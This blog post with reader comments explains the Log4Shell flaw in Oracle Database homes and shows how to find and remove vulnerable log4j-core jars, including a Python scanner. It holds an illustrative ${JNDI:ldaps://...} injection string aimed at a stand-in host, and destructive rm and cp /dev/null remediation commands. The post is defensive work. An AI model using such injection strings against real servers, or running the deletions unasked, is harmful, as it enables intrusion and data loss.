The CVE-2021-44228 issue allows a user without authentication to execute code. It is tremendously easy to exploit; it is more a working-as-designed feature than a hard-core memory glitch.
Log4j is a logging library for Java. If you enter some unexpected string, your web server may log it to a logfile.
- What’s your name?
- John
- What’s your age?
- 1000
- Come on, that’s not possible
2021-01-05 John says he's 1000
So far so good. But one log4j developer probably found it useful to add variable expansion and the like.
- What’s your name?
- John
- What’s your age?
- ${JNDI:ldaps://example.com/rm-rf-*}
- Come on, that’s not possible
2021-01-05 John says he's 1m files removed
Server attacked. This of course works best for the attacker when multiple flaws line up: there are no firewalls and the web server logs everything with log4j.
Anyway, it isn’t a good feeling to be at risk.
It requires some careful reading to check if Oracle Database is affected.
One may check Oracle Support doc 2828877.1:
Oracle Database (all supported versions including 11.2, 12.1, 12.2, 19c, and 21c) are not affected by vulnerability CVE-2021-44228 or CVE-2021-45046.
But the innocent reader may stop here.
Let’s check some software, for instance RDBMS 19.6.
$ find . -name "log4j-core*.jar"
./suptools/tfa/release/tfa_home/jlib/log4j-core-2.9.1.jar
./md/property_graph/lib/log4j-core-2.11.0.jar
What??? Isn’t that log4j lying around?
Other notes say that CVE-2021-45105, CVE-2021-44228 and CVE-2021-45046 are addressed in AHF version 21.4.
$ suptools/tfa/release/tfa_home/bin/tfactl version
/oracle/suptools/tfa/release/tfa_home/bin
TFA Version : 183300
TFA Build ID : 20190315044534
So there I am at risk.
- WARNING: removing TFA prevents autopatch from patching
Two solutions: update TFA if you need it, or remove it with
tfactl uninstall
(rm will also do)
What does Oracle say about md?
Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45104, and CVE-2021-45105 concern Spatial in versions 12.2, 18.x, and 21.x.
If you use Spatial, then patch it. Otherwise, Oracle recommends removing the whole md/property_graph directory (doc 2652121.1).
WARNING: this may impact cluster verify!
rm -r md/property_graph
12.1 (also client) has a few log4j-core jars, but version 1.x, which is older and less critical. But due to the log4j hysteria, you may want to remove some of those, like $ORACLE_HOME/oui/jlib/jlib/log4j-core.
$ unzip -p -l oui/jlib/jlib/log4j-core.jar META-INF/MANIFEST.MF|grep Implementation-Version
Implementation-Version: 1.1.1
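To run the find and manifest check above across a whole home in one go, here is an added Python example (not code from the original post or from Oracle): it lists every log4j-core jar under a directory, reads Implementation-Version, and flags 2.x jars below 2.17.0 or still shipping the JndiLookup class. The home it scans is constructed in a temporary directory with fake jars whose paths mirror the ones found above.

```python
import os
import re
import tempfile
import zipfile

# Class behind ${jndi:...} lookups; deleting it from the jar is Apache's published mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 17, 0)  # 2.x release where CVE-2021-44228, -45046 and -45105 are all addressed

def jar_version(path):
    """Implementation-Version from META-INF/MANIFEST.MF, like the unzip | grep above."""
    with zipfile.ZipFile(path) as jar:
        text = jar.read("META-INF/MANIFEST.MF").decode() if "META-INF/MANIFEST.MF" in jar.namelist() else ""
    m = re.search(r"^Implementation-Version:\s*(\S+)", text, re.M)
    return m.group(1) if m else None

def classify(path):
    parts = tuple(int(p) for p in re.findall(r"\d+", jar_version(path) or "")[:3]) or (0,)
    if parts[0] == 1:
        return "log4j 1.x: not affected by CVE-2021-44228, but end of life"
    with zipfile.ZipFile(path) as jar:
        jndi = JNDI_CLASS in jar.namelist()
    if jndi or parts < FIXED:  # unknown version is treated as affected
        return "AFFECTED: 2.x below 2.17.0 or JndiLookup.class still present"
    return "ok"

def scan(root):
    """Walk a home like the find command above; return (relative path, version, verdict)."""
    hits = []
    for d, _, files in os.walk(root):
        for f in files:
            if f.startswith("log4j-core") and f.endswith(".jar"):
                p = os.path.join(d, f)
                hits.append((os.path.relpath(p, root), jar_version(p), classify(p)))
    return sorted(hits)

def make_sample_home():
    root = tempfile.mkdtemp(prefix="oracle_home_")
    samples = {  # constructed sample: relative jar path -> (Implementation-Version, ship JndiLookup?)
        "suptools/tfa/release/tfa_home/jlib/log4j-core-2.9.1.jar": ("2.9.1", True),
        "md/property_graph/lib/log4j-core-2.11.0.jar": ("2.11.0", True),
        "oui/jlib/jlib/log4j-core.jar": ("1.1.1", False),
        "patched/log4j-core-2.17.1.jar": ("2.17.1", False),
    }
    for rel, (ver, jndi) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {ver}\n")
            if jndi:
                jar.writestr(JNDI_CLASS, b"")  # placeholder entry, not real bytecode
    return root
```

Point scan() at a real $ORACLE_HOME to get the same three-column report for your own jars.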
Minimizing the impact of log4j is one thing, but pretending we’re unaffected isn’t really helpful.
One of these days, your secadmin will scan your server for old log4j classes; better remove yours now to avoid negative visibility.
Hello
Something strange: we need to remove the md directory in the grid home, but clusterverify will not work anymore.
Thank you
Hi Tga
That’s good to know, thanks. I have updated my post with this side effect.
I hope you can restore your file to fix your clusterverify
Thanks
Hi,
Thank you for this great post.
Concerning TFA, is it better to remove the entire TFA_HOME or only the log4j-core file?
Is there a risk if TFA is not installed because it is too old, more than 180 days?
To guarantee patching, I guess you could empty the jar file …
cp /dev/null log4j-core.jar
So OPatch will still be able to archive the file, but it’s hard to predict what else will fail …